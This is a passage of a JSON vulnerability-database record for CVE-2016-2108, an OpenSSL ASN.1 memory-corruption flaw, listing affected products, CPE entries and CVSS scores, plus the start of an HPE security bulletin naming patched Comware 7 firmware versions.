"model": "virtual security gateway for microsoft hyper-v vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "connected grid router cgos 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2.3" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "xenserver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.2" }, { "model": "spa232d multi-line dect ata", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.2" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3700-" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1-" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "19.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9951" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1876" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "local collector appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.17" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.4-12" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder 10.5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.2" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "qradar siem mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.113" }, { "model": "nexus", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "900012.0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7(0)" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "xenserver service pack", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.51" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-2.5" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services analytic platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79009.4(2)" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.17" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.5-" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "unified series ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "video surveillance media server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.9" }, { "model": "unified communications manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.5" }, { "model": "xenserver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.5" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "policy suite", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified communications manager session management edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.1" }, { "model": "anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.4.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4-" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "webex meetings server mr1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.99.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "asa cx and cisco prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.13900.9)" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(0.98000.88)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" } ], "sources": [ { "db": "BID", "id": "89752" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1n", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:google:android:4.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2108" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "139115" }, { "db": "PACKETSTORM", "id": "136937" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "139116" } ], "trust": 0.4 }, "cve": "CVE-2016-2108", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "CVE-2016-2108", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-2108", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2108", "trust": 1.8, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2016-2108", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2108" }, { "db": "JVNDB", "id": "JVNDB-2016-002475" }, { "db": "NVD", "id": "CVE-2016-2108" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the \"negative zero\" issue. OpenSSL is prone to remote memory-corruption vulnerability. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2c\nOpenSSL versions 1.0.1 prior to 1.0.1o. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n - CVE-2016-2105 - Remote Denial of Service (DoS)\n - CVE-2016-2106 - Remote Denial of Service (DoS)\n - CVE-2016-2107 - Remote disclosure of sensitive information\n - CVE-2016-2108 - Remote Denial of Service (DoS)\n - CVE-2016-2109 - Remote Denial of Service (DoS)\n - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2108\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-2176\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) - Version: R7377P02\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 10500 (Comware 7) - Version: R7184\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 